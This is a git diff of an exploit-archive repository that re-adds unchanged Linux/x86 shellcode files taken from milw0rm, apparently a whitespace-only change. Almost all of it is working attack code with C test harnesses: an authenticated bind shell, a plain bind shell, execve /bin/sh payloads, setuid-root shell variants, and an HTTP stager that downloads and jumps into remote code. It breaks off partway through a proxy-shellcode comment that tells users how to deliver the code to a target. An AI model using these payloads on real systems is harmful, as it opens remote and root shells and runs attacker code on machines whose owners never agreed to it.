- "\x66\x68\x50\x61" // pushw $0x6150
- "\x89\xe7" // mov $esp,%edi
- "\x6a\x0a" // push $0xa
- "\x57" // push %edi
- "\x56" // push %esi
- "\x89\xe1" // mov %esp,%ecx
- "\xb3\x09" // mov $0x9,%bl
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- /* recv(s, *buf, 0x08, flags) */
-
- "\x52" // push %edx
- "\x6a\x08" // push $0x8
- "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx
- "\x51" // push %ecx
- "\x56" // push %esi
- "\x89\xe1" // mov %esp,%ecx
- "\xb3\x0a" // mov $0xa,%bl
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
-
- "\x87\xf3" // xchg %esi,%ebx
-
- /* like: strncmp(string1, string2, 0x8) */
-
- "\x52" // push %edx
- "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password
- "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here
- "\x89\xe7" // mov %esp,%edi
- "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi
- "\x89\xd1" // mov %edx,%ecx
- "\x80\xc1\x08" // add $0x8,%cl
- "\xfc" // cld
- "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi)
- "\x74\x04" // je dup
-
- /* exit(something) */
-
- "\xf7\xf0" // div %eax
- "\xcd\x80" // int $0x80
-
- /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
-
- "\x6a\x02" // push $0x2
- "\x59" // pop %ecx
-
- "\xb0\x3f" // mov $0x3f,%al
- "\xcd\x80" // int $0x80
- "\x49" // dec %ecx
- "\x79\xf9" // jns dup_loop
-
- /* execve("/bin/sh", ["/bin/sh"], NULL) */
-
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp, %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp, %ecx
- "\xcd\x80"; // int $0x80
-
-
-int main() {
-
- int (*f)() = (int(*)())shellcode;
- printf("Length: %u\n", strlen(shellcode));
- f();
-}
-
+/*
+ * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86
+ * Copyright (c) 2006 Gotfault Security
+ *
+ * portbind shellcode that bind()'s a shell on port 64713/tcp
+ * and requests a user password.
+ *
+ */
+
+char shellcode[] =
+
+ /* socket(AF_INET, SOCK_STREAM, 0) */
+
+ "\x6a\x66" // push $0x66
+ "\x58" // pop %eax
+ "\x6a\x01" // push $0x1
+ "\x5b" // pop %ebx
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x6a\x02" // push $0x2
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80" // int $0x80
+
+ /* bind(s, server, sizeof(server)) */
+
+ "\x52" // push %edx
+ "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
+ "\x66\x6a\x02" // pushw $0x2
+ "\x89\xe1" // mov $esp,%ecx
+ "\x6a\x10" // push $0x10
+ "\x51" // push %ecx
+ "\x50" // push %eax
+ "\x89\xe1" // mov %esp,%ecx
+ "\x89\xc6" // mov %eax,%esi
+ "\x43" // inc %ebx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ /* listen(s, anything) */
+
+ "\xb0\x66" // mov $0x66,%al
+ "\xd1\xe3" // shl %ebx
+ "\xcd\x80" // int $0x80
+
+ /* accept(s, 0, 0) */
+
+ "\x52" // push %edx
+ "\x52" // push %edx
+ "\x56" // push %esi
+ "\x89\xe1" // mov %esp,%ecx
+ "\x43" // inc %ebx
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ "\x96" // xchg %eax,%esi
+
+ /* send(s, "Password: ", 0x0a, flags) */
+
+ "\x52" // push %edx
+ "\x68\x72\x64\x3a\x20" // push $0x203a6472
+ "\x68\x73\x73\x77\x6f" // push $0x6f777373
+ "\x66\x68\x50\x61" // pushw $0x6150
+ "\x89\xe7" // mov $esp,%edi
+ "\x6a\x0a" // push $0xa
+ "\x57" // push %edi
+ "\x56" // push %esi
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb3\x09" // mov $0x9,%bl
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ /* recv(s, *buf, 0x08, flags) */
+
+ "\x52" // push %edx
+ "\x6a\x08" // push $0x8
+ "\x8d\x4c\x24\x08" // lea 0x8(%esp),%ecx
+ "\x51" // push %ecx
+ "\x56" // push %esi
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb3\x0a" // mov $0xa,%bl
+ "\xb0\x66" // mov $0x66,%al
+ "\xcd\x80" // int $0x80
+
+ "\x87\xf3" // xchg %esi,%ebx
+
+ /* like: strncmp(string1, string2, 0x8) */
+
+ "\x52" // push %edx
+ "\x68\x61\x75\x6c\x74" // push $0x746c7561 // password
+ "\x68\x67\x6f\x74\x66" // push $0x66746f67 // here
+ "\x89\xe7" // mov %esp,%edi
+ "\x8d\x74\x24\x1c" // lea 0x1c(%esp),%esi
+ "\x89\xd1" // mov %edx,%ecx
+ "\x80\xc1\x08" // add $0x8,%cl
+ "\xfc" // cld
+ "\xf3\xa6" // repz cmpsb %es:(%edi),%ds:(%esi)
+ "\x74\x04" // je dup
+
+ /* exit(something) */
+
+ "\xf7\xf0" // div %eax
+ "\xcd\x80" // int $0x80
+
+ /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
+
+ "\x6a\x02" // push $0x2
+ "\x59" // pop %ecx
+
+ "\xb0\x3f" // mov $0x3f,%al
+ "\xcd\x80" // int $0x80
+ "\x49" // dec %ecx
+ "\x79\xf9" // jns dup_loop
+
+ /* execve("/bin/sh", ["/bin/sh"], NULL) */
+
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp, %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp, %ecx
+ "\xcd\x80"; // int $0x80
+
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+}
+
 // milw0rm.com [2006-04-06]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13374.c b/platforms/lin_x86/shellcode/13374.c
index a5322287e..8a352b24f 100755
--- a/platforms/lin_x86/shellcode/13374.c
+++ b/platforms/lin_x86/shellcode/13374.c
@@ -1,86 +1,86 @@ -/* - * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 - * Copyright (c) 2006 Gotfault Security - * - * portbind shellcode that bind()'s a shell on port 64713/tcp - * - */ - -char shellcode[] = - - /* socket(AF_INET, SOCK_STREAM, 0) */ - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x99" // cltd - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - /* bind(s, server, sizeof(server)) */ - - "\x52" // push %edx - "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 - "\x66\x6a\x02" // pushw $0x2 - "\x89\xe1" // mov $esp,%ecx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\x89\xc6" // mov %eax,%esi - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - /* listen(s, anything) */ - - "\xb0\x66" // mov $0x66,%al - "\xd1\xe3" // shl %ebx - "\xcd\x80" // int $0x80 - - /* accept(s, 0, 0) */ - - "\x52" // push %edx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - "\x93" // xchg %eax,%ebx - - /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ - - "\x6a\x02" // push $0x2 - "\x59" // pop %ecx - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns dup_loop - - /* execve("/bin/sh", ["/bin/sh"], NULL) */ - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 + * Copyright (c) 2006 Gotfault Security + * + * 
portbind shellcode that bind()'s a shell on port 64713/tcp + * + */ + +char shellcode[] = + + /* socket(AF_INET, SOCK_STREAM, 0) */ + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x99" // cltd + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + /* bind(s, server, sizeof(server)) */ + + "\x52" // push %edx + "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 + "\x66\x6a\x02" // pushw $0x2 + "\x89\xe1" // mov $esp,%ecx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\x89\xc6" // mov %eax,%esi + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + /* listen(s, anything) */ + + "\xb0\x66" // mov $0x66,%al + "\xd1\xe3" // shl %ebx + "\xcd\x80" // int $0x80 + + /* accept(s, 0, 0) */ + + "\x52" // push %edx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + "\x93" // xchg %eax,%ebx + + /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ + + "\x6a\x02" // push $0x2 + "\x59" // pop %ecx + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns dup_loop + + /* execve("/bin/sh", ["/bin/sh"], NULL) */ + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-06] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13375.c b/platforms/lin_x86/shellcode/13375.c index e2c97e8a8..1ad9a0e71 100755 --- a/platforms/lin_x86/shellcode/13375.c +++ b/platforms/lin_x86/shellcode/13375.c 
@@ -1,29 +1,29 @@ -/* - * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) - * - 25 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x31\xc0" // xor %eax, %eax - "\x50" // push %eax - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x50" // push %eax - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\x31\xd2" // xor %edx, %edx - "\xb0\x0b" // mov $0xb, %al - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) + * - 25 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x31\xc0" // xor %eax, %eax + "\x50" // push %eax + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x50" // push %eax + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\x31\xd2" // xor %edx, %edx + "\xb0\x0b" // mov $0xb, %al + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13376.c b/platforms/lin_x86/shellcode/13376.c index b0c96a4f7..83b6fec88 100755 --- a/platforms/lin_x86/shellcode/13376.c +++ b/platforms/lin_x86/shellcode/13376.c 
@@ -1,31 +1,31 @@ -/* - * linux-x86-binshv2.c - 23 bytes - * Copyright (c) 2006 Gotfault Security - * - * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) - * - */ - - -char shellcode[] = - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * linux-x86-binshv2.c - 23 bytes + * Copyright (c) 2006 Gotfault Security + * + * (Linux/x86) execve("/bin/sh", ["/bin/sh", NULL]) + * + */ + + +char shellcode[] = + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13377.c b/platforms/lin_x86/shellcode/13377.c index 4572251ae..483b93358 100755 --- a/platforms/lin_x86/shellcode/13377.c +++ b/platforms/lin_x86/shellcode/13377.c 
@@ -1,34 +1,34 @@ -/* - * (Linux/x86) setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 31 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 31 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13378.c b/platforms/lin_x86/shellcode/13378.c index 9af8661b1..a0e5e0bc5 100755 --- a/platforms/lin_x86/shellcode/13378.c +++ b/platforms/lin_x86/shellcode/13378.c 
@@ -1,39 +1,39 @@ -/* - * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 37 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x17" // push $0x17 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\xcd\x80" // int $0x80 - - "\x6a\x2e" // push $0x2e - "\x58" // pop %eax - "\x53" // push %ebx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 37 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13379.c b/platforms/lin_x86/shellcode/13379.c index 8e5701cce..865e27076 100755 --- a/platforms/lin_x86/shellcode/13379.c +++ b/platforms/lin_x86/shellcode/13379.c 
@@ -1,35 +1,35 @@ -/* - * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL]) - * - 33 bytes - * - xgc@gotfault.net - * - */ - -char shellcode[] = - - "\x6a\x46" // push $0x46 - "\x58" // pop %eax - "\x31\xdb" // xor %ebx, %ebx - "\x31\xc9" // xor %ecx, %ecx - "\xcd\x80" // int $0x80 - - "\x31\xd2" // xor %edx, %edx - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp, %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp, %ecx - "\xcd\x80"; // int $0x80 - -int main() { - - int (*f)() = (int(*)())shellcode; - printf("Length: %u\n", strlen(shellcode)); - f(); -} - +/* + * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 33 bytes + * - xgc@gotfault.net + * + */ + +char shellcode[] = + + "\x6a\x46" // push $0x46 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\x31\xc9" // xor %ecx, %ecx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80"; // int $0x80 + +int main() { + + int (*f)() = (int(*)())shellcode; + printf("Length: %u\n", strlen(shellcode)); + f(); +} + // milw0rm.com [2006-04-03] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13380.c b/platforms/lin_x86/shellcode/13380.c index b711b40ff..55ea38dd2 100755 --- a/platforms/lin_x86/shellcode/13380.c +++ b/platforms/lin_x86/shellcode/13380.c 
@@ -1,141 +1,141 @@ -/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+ - * - * This shellcode allows you to download a binary code straight off a standard HTTP server - * and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack. - * - * : - * - * > Starting by creating a very simple shellcode, that will be downloaded and execute. - * - * root@magicbox:/tmp# cat foobar.s - * .section .text - * .global _start - * _start: - * - * movl $0x4, %eax - * movl $0x1, %ebx - * - * call _doint - * .ascii "Hello World!" - * .byte 0xa - * _doint: - * popl %ecx - * movl $0xd, %edx - * int $0x80 - * - * movl $0x1, %eax - * int $0x80 - * - * # Reverse CALL - * call _start - * - * > The only requirement from the downloaded shellcode, is that it will include a reverse - * CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know - * where the downloaded shellcode begins or ends. Therefor it realys on the downloaded - * shellcode to supply that, by including a CALL in the bottom, which will be JMP into. - * - * > Compile the given shellcode - * - * root@magicbox:/tmp# as -o foobar.o foobar.s - * root@magicbox:/tmp# ld -o foobar foobar.o - * - * > Convert this file into a raw binary (headerless, formatless) - * - * root@magicbox:/tmp# objcopy -O binary foobar foobar.bin - * - * > Host this file, on some HTTP server (I haved used Apache/1.3.34) - * - * > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin) - * - * > Paste the gen_httpreq.c output, into this shellcode at the marked place. - * - * > Compile this shellcode w/ the gen_httpreq output in it. - * - * > Execute this shellcode - * - * root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c - * root@magicbox:/tmp# ./http-download-jmp - * Hello World! 
- * root@magicbox:/tmp# - * - * : - * - * gen_httpreq.c, generates a HTTP GET request for this shellcode - * > http://www.tty64.org/shellcode/utilities/gen_httpreq.c - * - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5b" // pop %ebx - "\x5d" // pop %ebp - - // - "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi - // (0x0xfeffff80 = ~127.0.0.1) - // - - // - "\x66\xbd\x91\x1f" // mov $0x1f91,%bp - // (0x1f91 = 8081/tcp) - // - - // - // "\x66\xbd\xaf\xff" // mov $0xffaf, %bp - // // (0xafff = ~0080/tcp) - // "\x66\xf7\xd5" // not %bp - // - - "\xf7\xd6" // not %esi - "\x56" // push %esi - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x43" // inc %ebx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\xb0\x66" // mov $0x66,%al - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - // - // - // - - "\x89\xe1" // mov %esp,%ecx - "\xb0\x04" // mov $0x4,%al - "\xcd\x80" // int $0x80 - - // - // <_recv_http_request>: - // - - "\xb0\x03" // mov $0x3,%al - "\x6a\x01" // push $0x1 - "\x5a" // pop %edx - "\xcd\x80" // int $0x80 - "\x41" // inc %ecx - "\x85\xc0" // test %eax,%eax - "\x75\xf4" // jne <_recv_http_request> - "\x83\xe9\x06" // sub $0x6,%ecx - "\xff\xe1"; // jmp *%ecx - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+ + * + * This shellcode allows you to download a binary code straight off a standard HTTP server + * and execute it. The downloaded shellcode (e.g. binary code) will be executed on the stack. + * + * : + * + * > Starting by creating a very simple shellcode, that will be downloaded and execute. 
+ * + * root@magicbox:/tmp# cat foobar.s + * .section .text + * .global _start + * _start: + * + * movl $0x4, %eax + * movl $0x1, %ebx + * + * call _doint + * .ascii "Hello World!" + * .byte 0xa + * _doint: + * popl %ecx + * movl $0xd, %edx + * int $0x80 + * + * movl $0x1, %eax + * int $0x80 + * + * # Reverse CALL + * call _start + * + * > The only requirement from the downloaded shellcode, is that it will include a reverse + * CALL to itself. As this shellcode does not parse the HTTP header, it has no way to know + * where the downloaded shellcode begins or ends. Therefor it realys on the downloaded + * shellcode to supply that, by including a CALL in the bottom, which will be JMP into. + * + * > Compile the given shellcode + * + * root@magicbox:/tmp# as -o foobar.o foobar.s + * root@magicbox:/tmp# ld -o foobar foobar.o + * + * > Convert this file into a raw binary (headerless, formatless) + * + * root@magicbox:/tmp# objcopy -O binary foobar foobar.bin + * + * > Host this file, on some HTTP server (I haved used Apache/1.3.34) + * + * > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin) + * + * > Paste the gen_httpreq.c output, into this shellcode at the marked place. + * + * > Compile this shellcode w/ the gen_httpreq output in it. + * + * > Execute this shellcode + * + * root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c + * root@magicbox:/tmp# ./http-download-jmp + * Hello World! 
+ * root@magicbox:/tmp# + * + * : + * + * gen_httpreq.c, generates a HTTP GET request for this shellcode + * > http://www.tty64.org/shellcode/utilities/gen_httpreq.c + * + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5b" // pop %ebx + "\x5d" // pop %ebp + + // + "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi + // (0x0xfeffff80 = ~127.0.0.1) + // + + // + "\x66\xbd\x91\x1f" // mov $0x1f91,%bp + // (0x1f91 = 8081/tcp) + // + + // + // "\x66\xbd\xaf\xff" // mov $0xffaf, %bp + // // (0xafff = ~0080/tcp) + // "\x66\xf7\xd5" // not %bp + // + + "\xf7\xd6" // not %esi + "\x56" // push %esi + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x43" // inc %ebx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\xb0\x66" // mov $0x66,%al + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + // + // + // + + "\x89\xe1" // mov %esp,%ecx + "\xb0\x04" // mov $0x4,%al + "\xcd\x80" // int $0x80 + + // + // <_recv_http_request>: + // + + "\xb0\x03" // mov $0x3,%al + "\x6a\x01" // push $0x1 + "\x5a" // pop %edx + "\xcd\x80" // int $0x80 + "\x41" // inc %ecx + "\x85\xc0" // test %eax,%eax + "\x75\xf4" // jne <_recv_http_request> + "\x83\xe9\x06" // sub $0x6,%ecx + "\xff\xe1"; // jmp *%ecx + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-03-12] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13381.c b/platforms/lin_x86/shellcode/13381.c index 7cd258fca..5b97bdb49 100755 --- a/platforms/lin_x86/shellcode/13381.c +++ b/platforms/lin_x86/shellcode/13381.c 
@@ -1,225 +1,225 @@ -// proxylib.c - is located at http://www.milw0rm.com/id.php?id=1476 /str0ke - -/******************************************************************** - - hey all.. this is my attempt at a very small very functional tcp - proxy shellcode.. to pull this off i ignored the "socks" protocols - and invented my own.. sorta.. - - how to use me.. - - deliver shellcode however you would normally deliver shellcode to a - machine, lets say 192.168.1.1 in this case.. - - on your machine you would setup the proxy library like so: - - phar@hatless-cat ~/proxyshell $ gcc -c -o proxyshell_connect.o proxylib.c -fpic - phar@hatless-cat ~/proxyshell $ ld -shared -o proxyshell_connect.so proxyshell_connect.o -ldl - phar@hatless-cat ~/proxyshell $ export LD_PRELOAD=/full/path/to/proxyshell_connect.so - phar@hatless-cat ~/proxyshell $ export SHELLPROXYHOST=192.168.1.16:1280 - - - from now on any calls to connect() will be proxied through the shellcode - which can handle multiple simultanious connections to arbitrary hosts. - - by default the shell binds to port 1280, you can easily modify which - the host binds to by finding the code labeled "port info" like this - - "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info - - invert the last for bytes (logical NOT) and you'll see where port - 0x5000 is declared.. adjust to whatever port you want, and reinvert.. - - - proxylib.c should be available at stonedcoder.org - - one last note about proxylib.c, it does not handle dns resolution properly, - so ip addresses only.. unless you know.. you feel like making it work.. 
